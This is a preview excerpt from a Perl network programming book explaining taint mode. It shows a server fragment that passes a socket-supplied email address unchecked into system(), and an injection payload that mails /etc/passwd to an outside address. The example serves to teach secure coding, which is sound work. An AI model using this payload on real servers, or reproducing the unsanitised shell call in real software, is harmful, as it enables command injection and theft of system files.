Taint Mode
Consider a hypothetical network server whose job includes generating e-mail to designated recipients. Such a server might accept e-mail addresses from a socket and pass those addresses to the UNIX Sendmail program. The code fragment to do that might look like this:
chomp($email =<$sock>); system "/bin/mail $email <Mail_Message.txt";
After reading the e-mail address from the socket, we call system() to invoke /usr/lib/sendmail with the desired recipient's address as argument. The standard input to sendmail is redirected from a canned mail message file.
This script contains a security hole. A malicious individual who wanted to exploit this hole could pass an e-mail address like this one:
badguy@hackers.com </etc/passwd; cat >/dev/null ...
Get Network Programming with Perl now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
